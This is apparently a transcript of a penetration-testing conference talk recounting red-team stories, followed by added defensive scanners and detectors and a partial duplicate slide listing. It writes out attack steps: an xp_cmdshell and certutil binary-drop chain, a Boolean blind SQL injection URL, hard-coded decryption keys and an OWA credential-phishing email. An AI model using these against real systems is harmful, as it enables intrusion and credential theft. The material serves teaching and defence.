Tales from the Dark Side
Dor Tumarkin, Application Security Researcher
Checkmarx
Presentation Agenda
• Introduction
• Penetration-Testing, Red-Teaming in a nutshell
• COOL STORIES
• Questions
• 2.5 years in Cisco Advanced Services
• Research New Tricks
• Write Reports
• Have Fun at Someone Else’s Expense
Penetration Testing
• Identify all vulnerabilities in a well-defined scope
• Exploit and demonstrate risk to environment
• “Can you pick the lock on my front door? Are my windows secure?”
Red Team
• Identify all vulnerabilities on a path to a specific goal within an organization
• Exploit anything in your way – computers, employees, nice security guards
• “Can you steal the jewels from the safe inside this locked building?”
Mind the Air-Gap
Mind the Air-Gap
• A Red Team on a big vendor (let’s call them E-Corp)
• Hundreds of thousands of internet facing IPs
• Behind a firewall, an IPS
• Mostly updated
• Dozens of web-applications
• With Web Application Firewalls
• Many interesting vulnerabilities, but no massive show-stoppers
• Remote access has 2-factor authentication, so phishing is limited
• …And we are looking for a solid way in
Mind the Air-Gap
• Multiple “presales labs” – blank demo environments owned by E-Corp, accessible via VPN
• One ESX server with multiple virtual E-Corp appliances inside
• No sensitive information
• No configurations
• No access to/from E-Corp’s network
• …but all passwords are either default or simple (ecorp123):
  • VPN
  • ESX
  • Remote Desktop
  • SSH
Mind the Air-Gap
• But what use to us is an empty lab?
• Well…
• So we log in, aaaand…
Boom.
Mind the Air-Gap
• This means that this ESX server for this lab is physically in a rack at some E-Corp site
• But we’re not in quite yet
Mind the Air-Gap
Where are we going to get credentials in an empty lab???
Ooooh nooooo…
Mind the Air-Gap
• Account credentials are SSO, double as Wi-Fi credentials
• And we got into corporate, just like that, over the air.
• And like every fairy-tale, it had a happy ending…
• …where we scored domain admin rights a few days later (LLMNR, etc.)
Conclusions
• No such thing as a “useless” or “harmless” environment
• Particularly – no such thing as “doesn’t need security”!
• “Remember my Password” on an untrusted computer in an untrusted lab? Come on, man.
King without a Crown
King without a Crown
• Sometimes, though not often, challenges present themselves INSIDE organizations
• Endpoint security
• Network security
• Tripwires
• This time challenges were presented as policies
King without a Crown
• We’re inside a massive organization – Umbrella Corp.
• Main objectives complete with time to spare
• Infiltrated from outside
• Collected most prized data – business development and finance
• Nobody noticed
• Collected a handful of domain user accounts on the way
• Secondary objective: own the domain - be a domain administrator!
King without a Crown
• We’ve searched ceaselessly for such accounts or employees by crawling a central management application that manages user accounts
• Everything is finely distributed between employees
• Company policy - No domain administrators!
King without a Crown
• Wait a minute – a central management web-application?
• Built using proprietary code!
• If it can manage all accounts – then it must have a really powerful active directory user!
• Maybe even… a domain admin?
• Comb the code repositories!
King without a Crown
• The dev code repo environment was very easy to find
• Code repository contains config files!
• Config file contains credentials!
    #LDAP user
    Username=KCD3A08381467823D4013960E75E465F0B00C5E3BAEFBECBB
    Password=JFJA90BVM2ZO0YJF67NQ72YUVN7B71POCZM3098FABVDADG3Q
• Wait, that doesn’t look right…
King without a Crown
• Config file contains encrypted credentials
• Company policy – passwords at rest MUST be encrypted or hashed
King without a Crown
• But the central management web-application isn’t the SERVER receiving these credentials
• It is a CLIENT of the active directory when using them
    User (Client) -> Web Server (Server to the user, Client to the backend) -> Backend (Server)
• Password-driven authentication requires Clients to have the actual password!
King without a Crown
• Server has to have credentials in “plaintext” at some point…
• Therefore - It must be able to decrypt this file!
King without a Crown
1. Identify what part of code opens the encrypted credentials config file
    $filename = 'config.ini';
    open($fh, $filename)
        or die "Could not open file '$filename'!";
*Pseudo-Code
King without a Crown
2. Trace code from that point to see where file is read, and where it is decrypted
    while ($row = $fh.readline()) {
        if ($row.startsWith('Username=')) {
            $username = crypto.decrypt($row[9:]);
        }
        if ($row.startsWith('Password=')) {
            $password = crypto.decrypt($row[9:]);
        }
    }
King without a Crown
3. Reverse-engineer encryption!
    function decrypt($encrypted) {
        $encrypted = reverseString($encrypted);
        $encrypted = $encrypted << 8;
        $magic = blowfish($encrypted, $keyOne);
        $decrypted = doMagic($magic, $keyTwo);
        return $decrypted;
    }
    $keyOne = 'tQ@vH8dM%agy6Y4RO';
    $keyTwo = '!#YCEKiMKijFtgcyZ';
This is very interesting and all but… Keep it simple! Grab their crypto!
King without a Crown
4. “Develop” a decryption tool
    [stolen code goes here]
    print("User:" + decrypt("KCD3A08381467823D4013960E75E465F0B00C5E3BAEFBECBB"));
    print("Pass:" + decrypt("JFJA90BVM2ZO0YJF67NQ72YUVN7B71POCZM3098FABVDADG3Q"));
    User: admin1user
    Pass: 9m5!4G4GaZ1VU@oi9Xh
5. Profit
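A repository check for the pattern in this story, added here as an example (not code from the talk or the client's application): it flags credential entries in config files whether or not their values look encrypted, and key constants hard-coded in source next to them, since together they make the "encryption" recoverable by anyone who can read the repo. The sample repository, file names and regexes are constructed assumptions; the config values and keys are the ones shown on the slides.

```python
"""Scan an in-memory repository (path -> text) for the "lock with the keys attached" pattern.

Added example, not code from the talk. Flags credential-looking config entries, labels
their values as plaintext or encoded, and flags key/secret constants in source code.
"""
import math
import re
from collections import namedtuple

Finding = namedtuple("Finding", "path line kind detail")

# Config keys that hold credentials; the value is sensitive whether or not it looks encrypted.
CRED_KEY = re.compile(r"^\s*(username|user|password|passwd|pwd|token)\s*=\s*(\S+)\s*$", re.I)
# Key/secret constants assigned a literal string in source, e.g. $keyOne = '...';
KEY_CONST = re.compile(r"""\$?\b(key\w*|secret\w*)\s*=\s*['"]([^'"]{8,})['"]""", re.I)
# Base64/hex-looking alphabet; combined with entropy to label a value as "encoded".
ENCODED_ALPHABET = re.compile(r"^[A-Za-z0-9+/=]{16,}$")


def shannon_entropy(value):
    """Bits per character; ciphertext, hashes and random tokens score high."""
    if not value:
        return 0.0
    counts = {}
    for ch in value:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_encoded(value):
    return bool(ENCODED_ALPHABET.match(value)) and shannon_entropy(value) > 3.0


def scan_file(path, text):
    """Findings for one file: credential entries and hard-coded key constants."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        cred = CRED_KEY.match(line)
        if cred:
            kind = "encoded-credential" if looks_encoded(cred.group(2)) else "plaintext-credential"
            findings.append(Finding(path, number, kind, cred.group(1)))
        key = KEY_CONST.search(line)
        if key:
            findings.append(Finding(path, number, "hardcoded-key", key.group(1)))
    return findings


def assess_repo(repo):
    """Return (verdict, findings) for a dict of path -> file text."""
    findings = [f for path, text in repo.items() for f in scan_file(path, text)]
    creds = [f for f in findings if f.kind.endswith("credential")]
    keys = [f for f in findings if f.kind == "hardcoded-key"]
    if creds and keys:
        verdict = "RECOVERABLE"  # credentials and the key to decrypt them ship together
    elif creds:
        verdict = "EXPOSED"      # credentials in the repo, key elsewhere: still a policy breach
    else:
        verdict = "CLEAN"
    return verdict, findings


# Constructed sample repository modelled on the config file and pseudo-code from the talk.
SAMPLE_REPO = {
    "config.ini": (
        "#LDAP user\n"
        "Username=KCD3A08381467823D4013960E75E465F0B00C5E3BAEFBECBB\n"
        "Password=JFJA90BVM2ZO0YJF67NQ72YUVN7B71POCZM3098FABVDADG3Q\n"
    ),
    "lib/crypto.pl": (
        "$keyOne = 'tQ@vH8dM%agy6Y4RO';\n"
        "$keyTwo = '!#YCEKiMKijFtgcyZ';\n"
    ),
    "README.md": "Central management application.\n",
}

if __name__ == "__main__":
    verdict, found = assess_repo(SAMPLE_REPO)
    print(verdict)
    for f in found:
        print(f"{f.path}:{f.line} {f.kind} ({f.detail})")
```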
King without a Crown
• And that is how we became the first human domain admin they’ve seen in years
• Was the “No domain admins” policy adhered to?
Conclusions
• A lock is meaningless if you attach the keys to it – ditto for encryption and its keys
• Keeping actionable information, such as passwords, in a dev environment is dangerous exposure
• Bending policies is not a way to solve problems, it’s a way to obscure them (barely)
The Phish that Kept on Phishing
The Phish that Kept On Phishing
• Most phishing awareness exercises involve employee awareness, which is very important
• Access that the average user has
• Would clicking a suspicious link mean the user will also submit their password?
• Or download and install a file?
• “Spear-Phishing” – are employees aware of more sophisticated, targeted attacks?
• But most phishing awareness exercises aren’t concerned with the risk of a successful attack
The Phish that Kept On Phishing
• Our client, a bank, wanted to find out what risks it faces from phishing
• We’ll call them Hacme, because why not
• They also required us to build a system for keeping track of phishing targets
• Each targeted e-mail received a link with a token
• This token was saved along with every action
*Illustration, it actually looked nothing like this
User       Token            IP              User Agent                             Action
Debbie M.  ja1Kd2moXpP2mJ   xxx.xxx.90.3    Mozilla/5.0 (iPhone; CPU iPhone OS…)   Clicked Link
Debbie M.  ja1Kd2moXpP2mJ   yyy.yyy.10.12   Mozilla/5.0 (Windows NT 6.1; WOW64)    Clicked Link
Debbie M.  ja1Kd2moXpP2mJ   yyy.yyy.10.12   Mozilla/5.0 (Windows NT 6.1; WOW64)    Logged in!
Andrew R.  u0IL9aZxQmnV3a   yyy.yyy.10.12   Mozilla/5.0 (Windows NT 6.1; WOW64)    Clicked Link
Andrew R.  u0IL9aZxQmnV3a   yyy.yyy.10.12   Mozilla/5.0 (Windows NT 6.1; WOW64)    Downloaded File
John U.    73aBVlkq9Arq8nb  zzz.zzz.90.114  Mozilla/5.0 (Linux; Android 4.0.4;…)   Clicked Link
The Phish that Kept On Phishing
• Good credentials to phish for should:
• Lead to as many sensitive environments as possible (SSO)
• Lead to sensitive data
• Lead to MORE ACCESS
The Phish that Kept On Phishing
• OWA is likely to contain sensitive information
• Accessible online
• Easy to impersonate by either installing your own server, or just replicating the login
• Seamless Phishing – user submits credentials, credentials are saved by attacker, client is forwarded seamlessly into their real OWA inbox
• Never know what hit ‘em
From: it-guy@hacme-mail.com
To: [target]@hacme.com
Please forward.
---Forwarded Message---
From: it-manager@hacme.com
Subject: Testing New OWA Login
To All Employees,
As many of you know, we were recently the targets of a large scale phishing attack[…]
We are transitioning to a new & secure environment[…]
https://owa.hacme-mail.com/owa/auth/login.aspx[…]
The Phish that Kept On Phishing
• Using our tracking system, we met our favorite victim ever - Debbie.
• Debbie is the best!
• We sent out 41 e-mails
• How many users did we phish within 2 hours?
117. That’s 300% (98 different users phished using Debbie’s token)
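The report a tracker like the one above can produce, added here as an example (not the client's tracking system): grouping every logged action by token shows which lures were forwarded, because one token then acts from several endpoints, which is how 41 e-mails can end with more victims than recipients. The records are constructed in the shape of the illustration table; the extra Debbie rows are an assumption showing the forwarded mail being opened on other machines.

```python
"""Campaign report from phishing-simulation tracking records.

Added example, not the tracking system from the talk. Each outbound mail carried a
per-recipient token and every click, login or download was logged with it.
"""

# Constructed records: (issued_to, token, ip, user_agent, action).
# issued_to is the recipient the token was mailed to, not necessarily who acted on it.
RECORDS = [
    ("Debbie M.", "ja1Kd2moXpP2mJ", "xxx.xxx.90.3", "Mozilla/5.0 (iPhone; CPU iPhone OS 9_3)", "Clicked Link"),
    ("Debbie M.", "ja1Kd2moXpP2mJ", "yyy.yyy.10.12", "Mozilla/5.0 (Windows NT 6.1; WOW64)", "Clicked Link"),
    ("Debbie M.", "ja1Kd2moXpP2mJ", "yyy.yyy.10.12", "Mozilla/5.0 (Windows NT 6.1; WOW64)", "Logged in!"),
    ("Debbie M.", "ja1Kd2moXpP2mJ", "yyy.yyy.10.57", "Mozilla/5.0 (Windows NT 6.1; WOW64)", "Logged in!"),
    ("Debbie M.", "ja1Kd2moXpP2mJ", "yyy.yyy.11.8", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Logged in!"),
    ("Andrew R.", "u0IL9aZxQmnV3a", "yyy.yyy.10.12", "Mozilla/5.0 (Windows NT 6.1; WOW64)", "Clicked Link"),
    ("Andrew R.", "u0IL9aZxQmnV3a", "yyy.yyy.10.12", "Mozilla/5.0 (Windows NT 6.1; WOW64)", "Downloaded File"),
    ("John U.", "73aBVlkq9Arq8nb", "zzz.zzz.90.114", "Mozilla/5.0 (Linux; Android 4.0.4)", "Clicked Link"),
]

# Actions that count as a compromise; a click alone only proves the mail was opened.
COMPROMISING = {"Logged in!", "Downloaded File"}


def victims_by_token(records):
    """token -> (issued_to, number of distinct endpoints that performed a compromising action).

    An endpoint is (ip, user agent). It is a lower bound on people: a corporate NAT puts many
    users behind one address, which is why the real system keyed on the credentials submitted.
    """
    issued_to = {}
    endpoints = {}
    for user, token, ip, agent, action in records:
        issued_to[token] = user
        endpoints.setdefault(token, set())   # keep tokens that never led to a compromise
        if action in COMPROMISING:
            endpoints[token].add((ip, agent))
    return {t: (issued_to[t], len(e)) for t, e in endpoints.items()}


def campaign_report(records, mails_sent):
    """Totals plus the tokens that were clearly forwarded (compromises from more than one endpoint)."""
    per_token = victims_by_token(records)
    victims = sum(n for _, n in per_token.values())
    return {
        "mails_sent": mails_sent,
        "victims": victims,
        "success_rate": victims / mails_sent,   # can exceed 100% once lures are forwarded
        "forwarded_tokens": sorted(t for t, (_, n) in per_token.items() if n > 1),
        "per_token": per_token,
    }


if __name__ == "__main__":
    report = campaign_report(RECORDS, mails_sent=3)
    print(f"{report['victims']} victims from {report['mails_sent']} mails "
          f"({report['success_rate']:.0%}); forwarded tokens: {report['forwarded_tokens']}")
```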
The Phish that Kept On Phishing
• On that day we celebrated Debbie, and all Debbies everywhere
• In retrospect we found out it was way worse than we thought
• …Debbie actually pulled this e-mail out of her spam box, before sending it to 300+ people.
• Because despite this phishing e-mail successfully passing through our testing spam filters…
The Phish that Kept On Phishing
• We were able to prove that spam filters aren’t a good defense
• Also that their phishing mitigation did not work
• But also – how easy it is to compromise employee e-mails
• We got a very broad user-base coverage – HR, PR, IT users
• IT users apparently shared passwords over e-mail, too.
The Phish that Kept On Phishing
• Let’s talk about Debbie
• Is Debbie REALLY a ?
• She may have messed up in her awareness
• She may have set the bar low
• But anyone can fall for the right lie
Conclusions
• Remember this acronym: N.B.D. – Never. Be. Debbie.
• Even people who practice N.B.D. daily can be fooled – always know your risks.
• 2-factor authentication, in this case, would have made a huge difference.
A Crowbar for Binary
A Crowbar for Binary
• A big financial institute had us engage their online assets and hack in
• We’ll call them Golden Calf Investments
• Not that many online assets
• Most interesting ones were scoped out because:
• No testing accounts or environments
• “Federal Regulations” (pfffff)
A Crowbar for Binary
• How do we get in if we’re told to stay away??
• Some canned marketing applications…
• Skin deep customer service applications…
• …Outsourced, not even part of the organization
• A couple of old employee-only applications…
• Wait a minute, that last one sounds promising!
A Crowbar for Binary
The New Target:
• Application with known exploits
• Got App-Admin in… 5 minutes?
• Got code running on web-server within a couple of hours
A Crowbar for Binary
• Realize web-server is boring, except for one database connection
• Database is internal, beyond DMZ?
• New goal: we own the database
• Wrote code to go through web-server and directly talk to DB (SQL)
A Crowbar for Binary
• So what database are we really attacking here?
• MSSQL
• Database running as “sa” (lol)
• VERY strict firewall rules
• Can’t pull malware.
• Can’t do much from inside out, really.
• So we HAVE to push!
A Crowbar for Binary
Challenge #1 – OS Commands:
• MSSQL feature - use xp_cmdshell to execute OS commands
• There’s a character restriction in SQL queries however
• Binaries would never fit
A Crowbar for Binary
Challenge #2 – Writing to Disk:
• Introducing the latest in computer hacking technology: THIS GUY!
A Crowbar for Binary
Challenge #3 – Normalization:
• Binary is binary
• It’s 99% garbage to (most) humans
• May contain bytes that break requests, or get altered on the way
• Normalize with Base64 – all bytes converted to alpha-numeric
A Crowbar for Binary
    Code:          Hello World!
    Base64:        SGVsbG8gV29ybGQh
    Echo to File:  echo SGVsbG8gV29ybGQh >> evil.b64.txt
    SQL Query:     xp_cmdshell 'echo SGVsbG8gV29ybGQh >> evil.b64.txt';
• Now that we know how to get binaries onto the server, let’s do it!
• Convert code to base64
• Chunk to segments that fit size restriction
• For every segment – create command
• For every command – execute with SQL
A Crowbar for Binary
• Great job getting a junk base64 file on the server!
• How do we convert it back to binary without tools?
• Maybe something that is naturally stored as either?
• A certificate can be either a binary or base64.
• It would be great if there was some sort of, I don’t know, a utility in Windows?
    certutil.exe -decode evil.b64.txt evil.exe
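Detection logic for the chain just described, added here as an example (not code from the talk): it runs over process-creation records and raises three signals per host, a shell spawned by sqlservr.exe (what xp_cmdshell looks like on the endpoint), repeated appends of base64 text to one file, and certutil decoding that file, then correlates them. The record format, host names, paths and threshold are constructed assumptions in the spirit of Sysmon event ID 1.

```python
"""Process-log detection for the xp_cmdshell -> echo-chunks -> certutil -decode chain.

Added example, not part of the talk. Input lines are constructed key=value process-creation
records with a quoted command line; malformed lines are ignored.
"""
import re
from collections import defaultdict

RECORD = re.compile(
    r'host=(?P<host>\S+) parent=(?P<parent>\S+) image=(?P<image>\S+) cmdline="(?P<cmdline>[^"]*)"'
)
ECHO_APPEND = re.compile(r"echo\s+(?P<chunk>[A-Za-z0-9+/=]+)\s*>>\s*(?P<file>\S+)", re.I)
CERTUTIL_DECODE = re.compile(r"certutil(?:\.exe)?\b.*-decode\s+(?P<src>\S+)\s+(?P<dst>\S+)", re.I)
SHELLS = {"cmd.exe", "powershell.exe"}
CHUNK_THRESHOLD = 3   # appends to the same file before it counts as a chunked drop
CHAIN = {"sql-shell", "chunked-file-drop", "certutil-decode"}


def parse(lines):
    """Yield the fields of each well-formed record."""
    for line in lines:
        m = RECORD.search(line)
        if m:
            yield m.groupdict()


def detect(lines):
    """Return (host, rule, detail) alerts for the three signals."""
    shells = defaultdict(int)                          # host -> shells spawned by sqlservr.exe
    appends = defaultdict(lambda: defaultdict(int))    # host -> file -> number of echo >> appends
    alerts = []
    for rec in parse(lines):
        host, cmd = rec["host"], rec["cmdline"]
        if rec["parent"].lower() == "sqlservr.exe" and rec["image"].lower() in SHELLS:
            shells[host] += 1       # a shell under the SQL Server service: xp_cmdshell in use
        m = ECHO_APPEND.search(cmd)
        if m:
            appends[host][m.group("file").lower()] += 1
        m = CERTUTIL_DECODE.search(cmd)
        if m:
            alerts.append((host, "certutil-decode", f"{m.group('src')} -> {m.group('dst')}"))
    for host, n in shells.items():
        alerts.append((host, "sql-shell", f"{n} shell(s) spawned by sqlservr.exe"))
    for host, files in appends.items():
        for path, n in files.items():
            if n >= CHUNK_THRESHOLD:
                alerts.append((host, "chunked-file-drop", f"{n} appends to {path}"))
    return alerts


def correlate(alerts):
    """Hosts on which every stage of the chain fired; these warrant an incident, not a ticket."""
    seen = defaultdict(set)
    for host, rule, _ in alerts:
        seen[host].add(rule)
    return sorted(host for host, rules in seen.items() if CHAIN <= rules)


# Constructed sample: a SQL Server host receiving the chunked drop (the slide's Hello World
# base64 split into three pieces), plus an unrelated workstation and a malformed line.
SAMPLE_LOG = [
    r'ts=2018-06-10T12:00:01Z host=DB01 parent=sqlservr.exe image=cmd.exe cmdline="cmd.exe /c echo SGVsbG >> C:\Temp\evil.b64.txt"',
    r'ts=2018-06-10T12:00:02Z host=DB01 parent=sqlservr.exe image=cmd.exe cmdline="cmd.exe /c echo 8gV29yb >> C:\Temp\evil.b64.txt"',
    r'ts=2018-06-10T12:00:03Z host=DB01 parent=sqlservr.exe image=cmd.exe cmdline="cmd.exe /c echo GQh >> C:\Temp\evil.b64.txt"',
    r'ts=2018-06-10T12:00:04Z host=DB01 parent=sqlservr.exe image=cmd.exe cmdline="cmd.exe /c certutil -decode C:\Temp\evil.b64.txt C:\Temp\evil.exe"',
    r'ts=2018-06-10T12:00:05Z host=WS07 parent=explorer.exe image=cmd.exe cmdline="cmd.exe /c echo hello >> notes.txt"',
    "this line is not a process record",
]

if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for alert in found:
        print(alert)
    print("full chain on:", correlate(found))
```

Disabling xp_cmdshell and not running the service as sa (the least-privilege point in the conclusions) removes the first stage entirely; the detection is for environments where that has not happened yet.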
A Crowbar for Binary
• Score!
• We’ve demonstrated executing a binary
• From the internet
• Riding a web server
• Pass through the database with queries
• And right into the DB’s operating system
• Can install tools to scan internal network
• Can have remote control with malware over DNS
• In retrospect – this DB was co-hosted with their main business transaction OraDB. Double Score!
Conclusions
• A small misconfiguration behind an outdated system can be crowbarred into a gaping hole
• Always patch your things, no matter how insignificant they seem
• The Principle of Least Privilege
(re)Applied Sciences
(re)Applied Sciences
• Reinventing the wheel is usually not recommended when unnecessary
• With the myriad of technologies out there, though, you never know what you’ll come across
• Sometimes, it’s all about taking something you know and understand and applying it to something you don’t
(re)Applied Sciences
• We were working on a large shipping company, let’s call them “Planet Express”
• We’ve found an application that behaves very oddly
• Landing page is empty
• Dorking “site:” leads to a directory listing
(re)Applied Sciences
• Directory listing contains… e-mail files?
• E-Mail files created very recently
• E-Mail contents seem automated, and contain links back to the site itself
• Links are to actual order information
(re)Applied Sciences
(Sophisticated Recreation)
• Why is this application so weird?
• Assumption: application is fully functioning when approached from internal network – externally, only links to orders can be accessed by clients
(re)Applied Sciences
• So of course, we test the only parameter we can access in this app by setting “orderId” to “1’ A ‘”
(Sophisticated Recreation)
• …Pardon?
• Not like any SQL error I have ever seen
(re)Applied Sciences
• And so a quick Google search taught us that this is, in fact…
Intersystems Cache SQL
Who?? What?? Ok, at least we know this word
(re)Applied Sciences
• What is this database, even??
• For one – it’s SQL, so it probably adheres to the same syntax:
    SELECT columns FROM database.table WHERE condition
• At the same time – it exhibits the exact same behavior a “common” SQL error would:
• Injected apostrophe (') breaks the syntax of the query
• Additional verbs after ' error out
• We can probably add more to the query, and get data!
(re)Applied Sciences
• So we can probably inject…
• …but the internet is clueless
• Very rare
• No tools
• No exploits
• Not even a tutorial
I DON’T KNOW WHO YOU ARE, BUT I WILL READ ABOUT YOU, AND I WILL HACK YOU
(re)Applied Sciences
• Which injection type do we choose?
• UNION based – unite columns to create new tables, hope web server renders right
• Error based – trigger an error that reflects information in its contents
• Boolean based – identify true and false conditions, use these as an oracle for data
• Boolean based are the only ones that require very little prior knowledge
(re)Applied Sciences
True statement: Give me orderId “AH0010-015” if 1=1
False statement: Give me orderId “AH0010-015” if 1=0
(re)Applied Sciences
• So what do we need for a Boolean SQL injection to work?
• We need to establish the injection variables for what we want to retrieve:
    SELECT columns FROM database.table WHERE boolean
• How do we find the database name?
• Table name?
• Column name?
• The right condition to help us retrieve data?
(re)Applied Sciences
• SQL usually has a table of tables, a table of databases, a table of columns etc.
• These are all mapped out in a known way
• Tools like SQLMap can automate the process because, once they fingerprint the database, they know where to find metadata
• But they’ve never even heard of “Intersystems Cache SQL”
(re)Applied Sciences
• Research – from documentation:
• Databases - SELECT SqlSchemaName FROM %dictionary.compiledclass WHERE SqlSchemaName LIKE '%'
• Tables - SELECT SqlSchemaName FROM %dictionary.compiledclass WHERE SqlSchemaName = 'db_name' AND SqlTableName LIKE 'table_name'
(re)Applied Sciences
• Research roadblock – no documentation of columns? Not in the same Dictionary.compiledclass??
• Ask an expert on StackOverflow!
(re)Applied Sciences
• We know where to get all the metadata we need to get all the stored data we want
• Now for a condition, and we’re good to go
• Keep it simple!
• WHERE parameter LIKE '[inject]%'
• WHERE parameter LIKE 'p%'
• WHERE parameter LIKE 'pa%'
• WHERE parameter LIKE 'pas%'…
(re)Applied Sciences
• Final injection form:
    orders.planetexpress.com/orders/manage/orders.jsp?orderId=AH00010-015' AND EXISTS (SELECT SqlSchemaName FROM %dictionary.compiledclass WHERE SqlSchemaName = 'db_name' AND SqlTableName LIKE 'table_name')
• Building this into a Python script that enumerates letters and numbers on the condition replicates the principles of SQLMap’s Boolean-based SQL injection
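Added here as an example, and not the script from the talk: rather than the enumerator itself, the access-log analysis that would have surfaced it, looking for the trail the procedure above leaves (a closing quote followed by AND/OR, %dictionary.compiledclass lookups, and LIKE prefixes that advance one candidate or one character per request, with two distinct response outcomes serving as the oracle). The log lines, client addresses and the chain metric are constructed assumptions.

```python
"""Access-log detection for Boolean-based blind injection probes against orders.jsp.

Added example, not from the talk. Parses constructed combined-format lines, keeps the
requests whose orderId carries an injection, and reports per client how far the
character-by-character extraction got.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

REQUEST = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
INJECTED = re.compile(r"'\s*(AND|OR)\b", re.I)          # closing quote followed by a boolean verb
LIKE_PREFIX = re.compile(r"LIKE\s*'([^'%]*)%'", re.I)    # the guessed prefix in LIKE 'pas%'


def parse_line(line):
    """Split one access-log line into client, path, decoded orderId and status (None if malformed)."""
    m = REQUEST.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    params = parse_qs(url.query, keep_blank_values=True)   # also percent-decodes the values
    return {
        "ip": m.group("ip"),
        "path": url.path,
        "order_id": params.get("orderId", [""])[0],
        "status": int(m.group("status")),
    }


def is_probe(order_id):
    return bool(INJECTED.search(order_id)) or "%dictionary." in order_id.lower()


def _continues(prev, cur):
    """cur follows prev in an oracle walk: next candidate at the same position, or one deeper."""
    if prev is None:
        return False
    if len(cur) == len(prev) + 1:
        return cur[:-1] == prev
    return len(cur) == len(prev) and cur[:-1] == prev[:-1]


def longest_chain(prefixes):
    """Longest run of LIKE prefixes that advance like a character-by-character extraction."""
    best = run = 0
    prev = None
    for p in prefixes:
        run = run + 1 if _continues(prev, p) else 1
        best = max(best, run)
        prev = p
    return best


def analyse(lines):
    """Per client: probe count, dictionary lookups, longest extraction chain, response outcomes."""
    probes = defaultdict(list)
    for line in lines:
        req = parse_line(line)
        if req and is_probe(req["order_id"]):
            probes[req["ip"]].append(req)
    report = {}
    for ip, reqs in probes.items():
        values = [r["order_id"] for r in reqs]
        prefixes = [m.group(1) for m in map(LIKE_PREFIX.search, values) if m]
        report[ip] = {
            "probes": len(values),
            "dictionary_lookups": sum("%dictionary." in v.lower() for v in values),
            "extraction_chain": longest_chain(prefixes),
            "statuses": sorted({r["status"] for r in reqs}),   # two outcomes = a usable oracle
        }
    return report


# Constructed sample log: one normal customer lookup, then one client walking the metadata table.
BASE = "/orders/manage/orders.jsp?orderId=AH00010-015"
META = ("'%20AND%20EXISTS%20(SELECT%20SqlSchemaName%20FROM%20%25dictionary.compiledclass"
        "%20WHERE%20SqlSchemaName%20LIKE%20'{}%25')")


def _line(ip, second, target, status):
    return f'{ip} - - [10/Jun/2018:12:00:{second:02d} +0000] "GET {target} HTTP/1.1" {status} 5120'


SAMPLE_LOG = [
    _line("198.51.100.7", 1, BASE, 200),
    _line("203.0.113.5", 2, BASE + "'%20AND%201=1", 200),
] + [
    _line("203.0.113.5", 3 + i, BASE + META.format(p), 200 if i % 2 == 0 else 500)
    for i, p in enumerate(["o", "p", "pa", "pb", "pl", "pla", "plan"])
]

if __name__ == "__main__":
    for ip, stats in analyse(SAMPLE_LOG).items():
        print(ip, stats)
```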
(re)Applied Sciences
• We never made it into a nice “tool” form
• We knew we’re not likely to see this system ever again…
• But we dumped enough of the database to demonstrate we could get all shipping information on every single client
Conclusions
• Exotic technology is still technology
• Obscure is not Secure
• A simple external test would have revealed the information leakage which has led to this exploitation
Final Thoughts
• Hacking is a lot more than just known vulnerabilities and available tools – it’s also a creative process
• Never underestimate your opponents
• Understanding & knowing risks and impact is as important as mitigating vulnerabilities in your network
Questions?
Thank you.

“Tales from the Dark Side” – Dor Tumarkin

  • 1.
    Tales from the DarkSide Dor Tumarkin, Application Security Researcher Checkmarx
  • 2.
    2 Presentation Agenda • Introduction •Penetration-Testing, Red-Teaming in a nutshell • COOL STORIES • Questions
  • 3.
    3 • • • • • 2.5 yearsin Cisco Advanced Services Research New Tricks Write ReportsHave Fun at Someone Else’s Expense
  • 4.
  • 5.
    5 • Identify allvulnerabilities in a well- defined scope • Exploit and demonstrate risk to environment • “Can you pick the lock on my front door? Are my windows secure?” Penetration Testing Red Team • Identify all vulnerabilities on a path to a specific goal within an organization • • Exploit anything in your way – computers, employees, nice security guards • “Can you steal the jewels from the safe inside this locked building?”
  • 6.
  • 7.
    7 Mind the Air-Gap •A Red Team on a big vendor (let’s call them E-Corp) • Hundreds of thousands of internet facing IPs • Behind a firewall, an IPS • Mostly updated • Dozens of web-applications • With Web Application Firewalls • Many interesting vulnerabilities, but no massive show-stoppers • Remote access has 2-factor authentication, so phishing is limited • …And we are looking for a solid way in
  • 8.
    8 Mind the Air-Gap •Multiple “presales labs” – blank demo environments owned by E-Corp, accessible via VPN • One ESX server with multiple virtual E-Corp appliances inside • No sensitive information • No configurations • No access to/from E-Corp’s network • …but all passwords are either default or simple (ecorp123) • VPN • ESX • Remote Desktop • SSH
  • 9.
    9 Mind the Air-Gap •But what use to us is an empty lab? • Well… • So we log in, aaaand… Boom.
  • 10.
    10 Mind the Air-Gap •This means that this ESX server for this lab is physically in a rack at some E-Corp site • But we’re not in quite yet
  • 11.
    11 Mind the Air-Gap Whereare we going to get credentials in an empty lab??? Ooooh nooooo…
  • 12.
    12 Mind the Air-Gap •Account credentials are SSO, double as Wi-Fi credentials • And we got into corporate, just like that, over the air. • And like every fairy-tale, it had a happy ending… • …where we scored domain admin rights a few days later (LLMNR, etc.)
  • 13.
    13 Conclusions • No suchthing as a “useless” or “harmless” environment • Particularly – no such thing as “doesn’t need security”! • “Remember my Password” on an untrusted computer in an untrusted lab? Come on, man.
  • 14.
  • 15.
    15 King without aCrown • Sometimes, though not often, challenges present themselves INSIDE organizations • Endpoint security • Network security • Tripwires • This time challenges were presented as policies
  • 16.
    16 King without aCrown • We’re inside a massive organization – Umbrella Corp. • Main objectives complete with time to spare • Infiltrated from outside • Collected most prized data – business development and finance • Nobody noticed • Collected a handful of domain user accounts on the way • Secondary objective: own the domain - be a domain administrator!
  • 17.
    17 King without aCrown • We’ve searched ceaselessly for such accounts or employees by crawling a central management application that manages user accounts • Everything is finely distributed between employees • Company policy - No domain administrators!
  • 18.
    18 King without aCrown • Wait a minute – a central management web-application? • Built using proprietary code! • If it can manage all accounts – then it must have a really powerful active directory user! • Maybe even… a domain admin? • Comb the code repositories!
  • 19.
